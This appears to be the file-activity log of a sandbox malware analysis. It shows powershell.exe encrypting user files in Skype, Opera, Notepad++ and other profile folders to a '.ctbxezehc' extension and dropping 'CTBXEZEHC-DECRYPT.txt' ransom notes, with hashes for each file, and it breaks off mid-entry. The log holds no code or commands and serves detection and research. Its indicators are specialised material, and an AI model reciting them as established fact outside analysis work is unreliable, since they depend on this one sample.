MD5: 6ce74e858834b88e5608d26702c63a02
SHA256: 608d21a9687e2c0dfb373d27f73366831d2a0ec716e3f00ad3cd1937c7354a71
3596
powershell.exe
C:\Users\admin\Contacts\admin.contact.ctbxezehc
binary
MD5: adc4f3e6edfff789d1d9fdebcccd1ce5
SHA256: 3943dd9c8969888fc72a6ff81fd3d2594241f7f5c76299fa217c61c76acf6139
3596
powershell.exe
C:\Users\admin\Desktop\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Desktop\awayroad.rtf.ctbxezehc
binary
MD5: 45816a426f26e68d5eca13dd0a93ea0c
SHA256: 577c6ea1df05a207d3c7def5979ec8c16173a8d551a750f96a1032bf50e3207a
3596
powershell.exe
C:\Users\admin\Desktop\cameraslarger.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\awayroad.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\chineseensure.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\tnqalxuybs.log.ctbxezehc
binary
MD5: 824731498de26f307525075bc43d722a
SHA256: 4b4eb36585662544d8b083c0a41bdd4e142940fc4fcf25b98ca5e2734d09b42e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.ctbxezehc
binary
MD5: 28aa5c59c1b9db5400ceeb049d2a57b0
SHA256: b3590d15dc3ff646ef27afe4b79eabb1c413f8820d21c619101ac0e9ac32bbc1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Contacts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\tnqalxuybs.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.ctbxezehc
binary
MD5: d3a34450a9c7fdc45b69d837c203e912
SHA256: 182fab8ba6fbae1b9374b162185344c30f9b91d42a512802f1db025e520f594d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Sun\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.ctbxezehc
binary
MD5: b4d96b4dcaa4550e608ae9bb42329530
SHA256: fd23fc16a9a5e070f931ed44f115f1e510c3defd06563d9d137a8c25abdedc1a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.ctbxezehc
binary
MD5: 156381adaae7ee20489c224706417870
SHA256: 9294c5f601fa620e089b290f0889c183497e4908299f7ba9f981f34aade4cad8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.ctbxezehc
binary
MD5: 884ecc97190feb59f9f9bebf1a961ec8
SHA256: 665a1b125882b12246f123fa21ba08dcbf1fd66854b7393b673c15c02a3495df
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.ctbxezehc
binary
MD5: 47f46b5bcf0921d855bdf58c75eee981
SHA256: 128912068ecc4b8c1c7c5f7030611ae3ecb81d424fd2949ac39044ed5a0f5309
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.ctbxezehc
binary
MD5: 260ea8ce18fe5c8aaa354f35c2554059
SHA256: 234e75ad9d5dae624ce20c179fe63523e93f7fca59bfcd69a81e1e6b604d55e9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.ctbxezehc
binary
MD5: 82ac2cd92d0ff19df0467e669b4da3e9
SHA256: ad4f9b34fbd13fef03e147ae523a2f76e0217db467ce74395d99d2c950551226
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.ctbxezehc
binary
MD5: 09c9d769631464d6cbca5f77d1c93984
SHA256: dbf25d56f1ad9c2f32c11778868410445e8029b1c4bebfd1b232d6866a8d735d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\logs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.ctbxezehc
binary
MD5: a6001e57d24ed3109f75e34ca6f42cc6
SHA256: 9e0dbf3e443beee1ac181e6c3cbb494a8ed905d8baa24eed1af2f02ccf6e5a61
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.ctbxezehc
binary
MD5: c37b7742b8f539669a3a22dc09d5b736
SHA256: 45e7c8cfed05fdfa63367c32d8f47d2e4084fc5be780e41abe69b5193482743d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.ctbxezehc
binary
MD5: e227e6bdf4eb685fc8bf4538764e793c
SHA256: 4262036b959f1378a67a6bab15cc27c91b316ec0680f651aad22d08f997d11aa
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.ctbxezehc
binary
MD5: c52ec265b5b2d8ceec86d5f375b1521f
SHA256: a46a9637a74af56e897f3ac940aeb255454b9c409dd05766153aa7ccda5c09ae
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.ctbxezehc
binary
MD5: 8a4e5dea93e4e086933d623a365537ac
SHA256: b6b36e46767952a0b560e735046e5cb69c964653c0590cdc4fa73991fbb5084a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.ctbxezehc
binary
MD5: 5990dda44062a3143803d4a9f66fe326
SHA256: 0e3a52f34ea2ab1f47ca49d3de1e3acec0006c0454894cfc63abf15fbf4fbde1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.ctbxezehc
binary
MD5: 90f7ad08335cd19eac0d77aea2838a96
SHA256: 32240eb649872bb0b1bdd82b9c198749e986e35ee03e9d410788866ce17f2523
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.ctbxezehc
binary
MD5: fc3aa27886c680863a13acf18ffe256c
SHA256: 7db2277bf62ccdd75a1eca65cdfb7be02f8e707df2813dc377fd93909a516766
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.ctbxezehc
binary
MD5: 4af2944325ac08f0e3df39f47a03612e
SHA256: 0c803ec64f3bde5b35765aacf78db22cea4ca4803ddd5534229fc37aaa03004a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.ctbxezehc
binary
MD5: bb135d6c85afce61697874fed55320d8
SHA256: de74f94528492ea8f6a93b5e01af0b43834218281dd925005e4f05dd7d871aa5
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.ctbxezehc
binary
MD5: c24a09c8bfd7c1761da614a189405b62
SHA256: de9b8b52985b9bd315b57cfe5673edfb7bdabd1e441aeee663a7e2c16376a913
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.ctbxezehc
binary
MD5: 209cf96c9479a451ba3301cc1e8d7e7f
SHA256: cb7daf78b5214ff8738c39dfa9f5bf3f9cde8dae161fb36e3e30960d5d403d7a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.ctbxezehc
binary
MD5: 281589ab62a5360d6a370ccf34cbe9e4
SHA256: 4287ce718227aa2667a522ce32259f873fa880da42cc0afff07b236afe96abf7
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.ctbxezehc
binary
MD5: d2c0d7dc359e0e9d92e8299d6207348d
SHA256: 447f4926c37f8b8f3d9299288fe3fee0986ad25d2945107fa7a6a4947ebb174d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.ctbxezehc
binary
MD5: 1dae365ed1028c07982278a05783ed3d
SHA256: f1c27de013f1a8ff3c08c73a1e4fbdc4bb25433cdc0bd29e9d0abe15a602cff9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.ctbxezehc
binary
MD5: ab1470cecae67c5e71b68ba26492bb12
SHA256: 6f2e8da8222f529e93d9c8a47baf9d6ccf1d7df5d05452bc052357281b71b123
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.ctbxezehc
binary
MD5: ec055eb94e88f89fa64a119132a06665
SHA256: 3cad03e9affdab26326eed616526aa7e5fc357169d2f9bb370e2626e9409b766
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.ctbxezehc
binary
MD5: ca88741c5d62ca76c7ee91d34b8eb3f2
SHA256: cc401e1666ba80d39f4d1e61bfbe0127af0c5d46f2bf4f648722d879067734e3
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.ctbxezehc
binary
MD5: e17a01b57f5f4e1248bfc44593584bae
SHA256: 1a7e8b7638f118f7ea03566ee69a11d209d2856fe4e66a653a74ad6dc9db512c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.ctbxezehc
binary
MD5: c2aed529419083197faa8ad313150196
SHA256: 6c02cf49d4d14b7747ceb0cdffcbcd490ac037997d579538bd4ed0b627d9386f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.ctbxezehc
binary
MD5: 242fbb9014c6f35adddc4e22744de568
SHA256: a1fbbb7cd06cf23370f732ef447a8c050f98fd9faf63e20d4f113b57f6883fc4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.ctbxezehc
binary
MD5: 765ae4da77bf3bd3ff04544c7d0c0cee
SHA256: ca20e8882f57ef81a5cee2c3b9cc58f914add5a7b9dfe18fc582a9a2bdbcc75d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.ctbxezehc
binary
MD5: 98b3b5993716d4a3e35fc6acde59bed6
SHA256: 258975bf40a15a678b215d7dfb86f177efc220440035cf8689823fec71732863
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.ctbxezehc
binary
MD5: 750cf67964ea2c1ff65ea5fe46d7cf41
SHA256: e09f3fc37c5f628ab2b58e571e369e3a851736673f66ab23efc56bb70b06c367
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.ctbxezehc
binary
MD5: 36bd37e286b20ef9514a71f80781181e
SHA256: 3feae356d2d4173c6507ca0ba6f8e95dfef27414072ce22dbb8409daf6e19331
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.ctbxezehc
binary
MD5: 90094495116e5bcbe7192991abf2ab8f
SHA256: ca51af4450a469eef5ba781965b820385bf757a803a7b96a573526541e4c6d79
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.ctbxezehc
binary
MD5: fb8ccf7f77ca55b6149dd3ab9d2246b1
SHA256: 5d219062e52614d35457a5312c46aa13abc3e3587a99ef4db6d43e437eeb9703
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.ctbxezehc
binary
MD5: 9153226120ff2cb6f9d0ce183d190821
SHA256: 9d70abf6bd298c426e0f158a6ded26339d15dc7500a5a4d9f919e8db15188682
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.ctbxezehc
binary
MD5: cef1fa31c604a602692144b5292e1c13
SHA256: 4165f2b338b893aab3e4747a57c704d29d3d911981313dc39309cf0e94ec6867
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.ctbxezehc
binary
MD5: a1f615ef63ef4cb7607607a441904c66
SHA256: cbb3a4869182b9f682ce682d4794aaffaab8634614bd49e39a339373040ea4d6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.ctbxezehc
binary
MD5: 9925742abd73853db7ecda67c84df014
SHA256: fd629ce5a3215139742e6d5a746b97fe6576980dbe91560dab61716f73de9578
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.ctbxezehc
binary
MD5: 8a733f02aeee0ac0e4e83f2a846fa342
SHA256: 21851a6ec9b20eabc8c6395dd5844f6c3b2d091d7a3318b76191ccbc7701358f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.ctbxezehc
binary
MD5: 81b62ca8a4411843157a4f9a7d064347
SHA256: f42ce6ddcfb59ec1f85012dd3e348f7a026553e54cf9011be82e77b5643f255a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.ctbxezehc
binary
MD5: 6105b6197460cf75cd9678477dd80960
SHA256: 04e011df913111a629a09c57f4c0dec697fe92848a0cfd2340e09ff43e4b2820
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.ctbxezehc
binary
MD5: dafbafda88a3a6eeeb44dc40b99a2e71
SHA256: 337d1a34138fb3cc02aa97cd1360699bc4da3ff87b58ff7c73d4ba188f525f2d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.ctbxezehc
binary
MD5: 207a658e59207ff41fc16240736df64d
SHA256: 5d5a5225d3355f2c55920001c2eaeb4e89745af607c65cca3e55c7f20345db1e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.ctbxezehc
binary
MD5: 44622cff4da1f6ac401a76b04c3b27bc
SHA256: 33d342ac57f9731690b2070fd435f28bf5f657a3b29ceb974b0f1e1a9cf8b1d7
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.ctbxezehc
binary
MD5: 66d55f2eca20ba5d7852a4ec1ccb4b0e
SHA256: 45abb9b5721f9d597060aecc9c58e29c432689450021996435e932fbb078448b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.ctbxezehc
binary
MD5: 49e6ad308b386f50683a392a5d16bf57
SHA256: 278d8e8848c474635d9e56a67e923c69fd2df81d2ccdf74a4e68f7a429895407
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.ctbxezehc
binary
MD5: f6661845a775a99b20000a83e31bab93
SHA256: 5e8ae5db4cc46090df7c72809732589946a4131e2ae4f1e3d2c7cff8f4f8e36c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.ctbxezehc
binary
MD5: 37fd318f823bbb50e31c632077414d8f
SHA256: 0249ef499cb7394d0fbfa7799bff9c98e5bb8107ad220e7e16fd49941907f43e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.ctbxezehc
binary
MD5: 33c92ce9e2aac1f990ea52967a311944
SHA256: d211a8d9e544d4cb294d50dd6e3d575d6402b37449f76f277aaca718c49aa8b1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.ctbxezehc
binary
MD5: a6450d710b4a35bddddb24a7f7726752
SHA256: 190ba9ebbc4b42e9c5a9012e26e1308ed641a8db6b2aefea4b106907c2b6395f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.ctbxezehc
binary
MD5: 13c62c4f18af76dde126ce1fdac91fe8
SHA256: 571183fbff31c331109c5f5ca8decb86e198490eced2c9239567edd9253423fa
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.ctbxezehc
binary
MD5: a03051224694d09d39942c2f87f99ea8
SHA256: e53ea1014260f4a5cb923376597687bf649a7e8a1aaf61bc193bf253c7556230
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.ctbxezehc
binary
MD5: fd0fb0c02a2649f20975ca3fd756aab3
SHA256: 02f45c070ed9180d06f18290341bfa9698837bf9206a630bb7d0321f8f96b661
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.ctbxezehc
binary
MD5: f713d38865c6e9592f4f11dc56d230dc
SHA256: 893d19344ba14a0bf25daf700a8b6723c76524a104431aa9a9d24b830ef6f0d9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.ctbxezehc
binary
MD5: 55b4eac295cb0fcdbc7cb7ad0e4026c3
SHA256: dfb57fa22542bf489febc8604d0eb8610b79f596e6de482449900f09204feceb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.ctbxezehc
binary
MD5: b89ec3752230945f9e72ddab971ffcaa
SHA256: 5b870fb53d9b24245bda1f570b906e417909e55acf012a4db62601a03b03d6cd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.ctbxezehc
binary
MD5: a89f0c0e814a2f1a68412738bbd48b29
SHA256: 5a3174145c5dec44b8b4429c32b7b38eafe8661ca7e27cfd2a5012fae7751c9b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.ctbxezehc
binary
MD5: 36ae4215aeacf384ac0c4d85a6626590
SHA256: e923c7e9237ad6bfa2add168bc6fedc0297ef2b6276473d98c253dee4e33efff
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.ctbxezehc
binary
MD5: 8cc2778cb10d4451e5a01516a82e3d52
